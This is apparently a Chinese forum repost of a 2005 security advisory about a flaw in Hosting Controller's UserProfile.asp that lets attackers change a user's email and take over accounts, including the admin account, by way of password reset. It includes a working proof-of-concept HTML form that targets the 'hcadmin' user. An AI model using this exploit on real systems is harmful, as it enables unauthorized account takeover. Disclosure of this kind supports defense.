[翻译]Hosting Controller的'UserProfile.asp'存在漏洞,可修改他人
资料翻译: fpx[BCT]翻译网站: Bug.Center.Team [url]http://www.cnbct.org[/url]
SecurityTracker ID: 1014062
漏洞引用: http:// securitytracker.com/id?1014062
CVE 叁考: GENERIC-MAP-NOMATCH
日期: 2005 年5月 27 日
影响: 攻击者通过网络修改用户信息。
影响版本: 6.1 HotFix 2.0 和之前版本
摘要: GrayHatz 安全组织的 Soroush Dalili公布Hosting Controller存在漏洞。利用此漏洞可以修改用户信息。'UserProfile.asp' 脚本设置不当,攻击者可以修改用户电子邮件帐号,然后通过“忘记密码”得到用户密码。同样可以用此方法得到管理员权限。
漏洞示范:
<form
action="http://[URL]/admin// accounts/UserProfile.asp?action=updateprofile"
method="post">
Username : <input name="UserList" value="hcadmin"
type="text" size="50">
<br>
emailaddress : <input name="emailaddress"
value="[email]Crkchat@msn.com[/email]" type="text" size="50">
<br>
firstname : <input name="firstname" value="Crkchat"
type="text" size="50">
<br>
<input name="submit" value="submit" type="submit">
</form>
解决: 官方尚未有解决方案。
厂商网址: [url]www.hostingcontroller.com[/url]
页:
[1]